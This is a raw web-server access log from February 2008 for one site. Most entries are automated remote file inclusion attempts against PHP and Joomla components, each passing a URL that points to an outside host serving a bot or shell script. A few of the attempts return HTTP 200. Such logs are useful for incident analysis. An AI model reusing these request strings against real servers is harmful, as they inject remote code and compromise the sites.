66.162.134.131 - - [08/Feb/2008:07:48:24 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:07:48:25 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:50 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:50 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:51 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:51 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:07:48:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.11 - - [08/Feb/2008:07:49:04 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:07:49:31 -0800] "GET /index.php?pag=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:07:49:31 -0800] "GET /logs/index.php?pag=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:07:49:34 -0800] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:07:49:51 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:07:49:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:49:56 -0800] "GET /logs/access_071230.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:49:56 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:49:57 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:07:49:58 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:07:50:02 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:07:50:08 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:50:11 -0800] "GET /logs/access_071230.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:50:11 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [08/Feb/2008:07:50:12 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:50:24 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:50:25 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:50:27 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:07:50:43 -0800] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:07:50:58 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:25 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:25 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:25 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:41 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:42 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:42 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:51:43 -0800] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:51:44 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:51:44 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:46 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:46 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:47 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:47 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:47 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.80 - - [08/Feb/2008:07:51:48 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:51:49 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:07:52:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:07:52:04 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:52:15 -0800] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:52:15 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:52:16 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:07:52:30 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:07:52:30 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.149.95.15 - - [08/Feb/2008:07:52:53 -0800] "GET /logs/access_071220.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbn.poilpark.net/docu/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:52:56 -0800] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:52:57 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.95.15 - - [08/Feb/2008:07:52:59 -0800] "GET /logs/access_071220.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbn.poilpark.net/docu/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:53:02 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.195.104 - - [08/Feb/2008:07:53:10 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.190.195.104 - - [08/Feb/2008:07:53:10 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:53:26 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:53:27 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [08/Feb/2008:07:53:28 -0800] "GET /components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:53:29 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:53:50 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:07:54:18 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:07:54:18 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [08/Feb/2008:07:54:37 -0800] "GET /components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:07:55:12 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:07:55:13 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:07:55:14 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:07:56:37 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.95 - - [08/Feb/2008:07:56:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:07:57:44 -0800] "GET /logs/access_071225.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:07:57:45 -0800] "GET /logs//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [08/Feb/2008:07:57:52 -0800] "GET /logs/access_071220.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:57:56 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:58:31 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:07:58:45 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:07:58:49 -0800] "GET /logs/stphpbtnimage.php?STPHPLIB_DIR=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:07:58:49 -0800] "GET /stphpbtnimage.php?STPHPLIB_DIR=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:58:53 -0800] "GET /logs/access_071230.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:58:54 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:07:58:55 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:14 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:15 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:16 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:17 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:18 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:18 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
66.126.221.50 - - [08/Feb/2008:07:59:19 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:07:59:24 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:07:59:24 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:07:59:24 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.227.171 - - [08/Feb/2008:07:59:55 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:07:59:56 -0800] "GET /logs/access_070825.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:07:59:59 -0800] "GET /logs/access_080201.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:08:00:00 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.77 - - [08/Feb/2008:08:00:01 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 34386 "-" "libwww-perl/5.808" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:08:00:05 -0800] "GET /logs/access_070825.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.103 - - [08/Feb/2008:08:00:14 -0800] "GET /index.php?pag=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:00:53 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:01:06 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:01:06 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:08:02:16 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.33.210 - - [08/Feb/2008:08:02:45 -0800] "GET /logs/access_080201.log/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [08/Feb/2008:08:02:46 -0800] "GET /logs/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:02:49 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:02:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
